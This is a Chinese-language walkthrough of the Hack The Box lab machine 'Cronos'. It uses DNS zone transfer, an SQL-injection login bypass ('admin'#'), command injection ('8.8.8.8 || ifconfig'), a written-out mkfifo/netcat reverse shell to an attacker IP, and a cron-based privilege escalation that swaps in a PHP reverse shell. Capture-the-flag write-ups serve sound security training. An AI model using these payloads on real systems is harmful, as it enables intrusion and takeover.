HTB靶场系列之Cronos通关攻略
2022-10-7 13:55:45 Author: Matrix1024(查看原文) 阅读量:21 收藏

使用Nmap对靶机进行端口嗅探,发现对外开放22、53、80端口,操作系统类型为Linux。

访问http://10.129.227.211/,为Apache的初始页面。

使用Dirsearch对http://10.129.227.211/进行扫描,未发现存在敏感目录。

对10.129.227.211IP进行反向解析,发现ns1.cronos.htbDNS服务器。

dig -x 10.129.227.211 @10.129.227.211

通过dig查看区域传输数据,发现以下域名信息。

dig axfr cronos.htb @10.129.227.211

admin.cronos.htbns1.cronos.htbwww.cronos.htbcronos.htb

将域名信息添加到/etc/hosts文件中。

访问http://www.cronos.htb,发现以下页面。

访问http://admin.cronos.htb/,发现以下页面。

最终在http://admin.cronos.htb/通过万能密码(admin'#)注入,成功进入。

进入后页面为ping或traceout的功能页面。

在功能页面中,输入8.8.8.8 || ifconfig,成功返回系统的ifconfig信息。

尝试反弹shell,在https://www.revshells.com/配置反弹shell信息,生成各种反弹shell语句。

尝试很多语句都失败了,最终通过以下语句成功反弹shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f

执行whoami命令发现是www-data权限。

在/home/noulis/目录下成功获取user.txt。

查看计划任务列表发现存在/var/www/laravel/artisan文件,它具备计划任务权限,且为root执行权限,查看文件信息,其所属者为www-data。即我们可以通过计划任务来进行提权。

查看/var/www/laravel/artisan文件信息,发现为PHP脚本。

在Kali中找到PHP反弹shell脚本,更改反弹shell信息。

Kali使用Python开启临时web服务。

在靶机上使用wget下载PHP反弹shell脚本,并赋予执行权限,通过mv命令将其替换/var/www/laravel/artisan文件。

Kali开启监听,成功获取root权限的shell。

在/root/目录下成功获取root.txt。


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NzYxMjI5OA==&mid=2247485403&idx=1&sn=28925a92e22e5d0f7ddbcd0a09d7e006&chksm=c06e68bef719e1a8ca11a7dd4e31fe49c46b47a0214dabf553f2b763ee96b6640d16c1c788c9#rd
如有侵权请联系:admin#unsafe.sh